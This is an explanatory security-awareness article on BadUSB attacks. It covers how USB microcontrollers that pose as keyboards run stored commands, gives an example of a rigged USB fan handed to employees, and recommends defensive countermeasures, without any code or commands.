BadUSB refers to USB devices that can execute malicious commands on a computer using a virtual keyboard, for example. These can be USB devices with modified firmware or microcontrollers specialized for this purpose. Due to the widespread use of the USB interface and its camouflage as input devices, BadUSB attacks can be difficult to prevent and at the same time cause a great deal of damage.
The biggest advantages of USB sticks – their small size and flexibility – are also their security weaknesses: They can be used inconspicuously to launch attacks on systems or copy data without authorization.
USB interfaces are not only installed in computer systems, but also more and more in various types of devices – from vacuum cleaning robots to alarm systems and industrial equipment. At the same time, many users are very familiar with using USB devices, as they are frequently used on a daily basis. As a result, they are often used without hesitation.
How it works
A BadUSB attack uses a microcontroller that has a USB interface that can act as a virtual device. The most common device used here is a virtual keyboard. In this case, commands, i.e. the keyboard entries, are stored in advance on the controller. As soon as this is then connected to a computer, the commands are executed. Thus, for example, any programs can be started or the command prompt can be opened and several commands can be entered. However, BadUSB not only works with keyboard inputs, but any input device can be simulated with it.
Attack scenario
In the past, controllers of this type have been hidden in other inconspicuous devices, such as a USB fan. On hot days, these are then given away by an attacker to employees of a target company. As soon as they then plug in the USB fan, the commands are executed. To the user, it looks as if the computer is taking care of itself. This type of cyber attack is also fatal on devices that have a USB interface but are not directly perceived as computers. These can be smart TVs, multifunction printers, alarm systems or production control systems, for example.
Countermeasures
Since input devices should be integrated by operating systems quickly and without further configuration, there are no major obstacles to a BadUSB attack. At the same time, the malware is located in an area on the USB device that is inaccessible to the operating system and therefore cannot be detected before execution.
Foreign USB devices should therefore only be connected with extreme caution and attention should be paid to any unusual behavior (e.g. message and sound for the installation of new hardware). If anomalies are detected, the device must be removed as quickly as possible. If devices with USB interfaces are installed in areas with public traffic, they should be deactivated by configuration or protected by structural measures.
There are also USB adapters that have no data connections and therefore only allow a power connection. They can be used to safely charge a smartphone on public USB plugs, for example. It is true that there are also adapters that only allow certain USB device types and block all others. However, this significantly limits the available bandwidth.
